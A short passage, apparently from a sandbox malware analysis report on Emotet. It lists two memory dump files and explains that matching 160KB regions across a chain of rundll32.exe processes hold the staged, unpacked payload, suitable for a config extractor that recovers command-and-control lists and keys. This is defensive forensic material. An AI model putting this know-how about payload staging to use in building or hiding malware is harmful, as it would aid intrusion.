    • memory/1952-109-0x00000000028D0000-0x00000000028F8000-memory.dmp (160KB)
    • memory/1952-111-0x0000000002BB0000-0x0000000002BD8000-memory.dmp (160KB)

    The 160KB (0x28000-byte) regions recur in every rundll32.exe of the chain (PIDs 1740, 1168, 1696 and 1952); same-sized private regions in each hop are the unpacked payload being staged, and these are the dumps to hand to an Emotet config extractor when the C2 list and keys above need re-deriving.
